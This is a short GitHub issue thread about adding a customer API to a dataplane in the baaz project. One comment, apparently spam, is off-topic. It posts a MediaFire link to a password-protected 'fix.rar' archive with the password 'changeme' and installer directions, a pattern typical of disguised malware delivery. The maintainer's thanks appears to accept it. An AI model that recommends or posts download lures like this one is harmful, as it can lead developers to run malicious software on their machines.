### ISSUE TITLE
[Customer] Add Customer API to add customer to dataplane.

### ISSUE THREAD

**Issue by AdheipSingh** [baazhq/baaz#97]
- Add customer API to add customer to a dataplane
- Update Docs and Postman.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AdheipSingh** [comment]
Thanks man !!
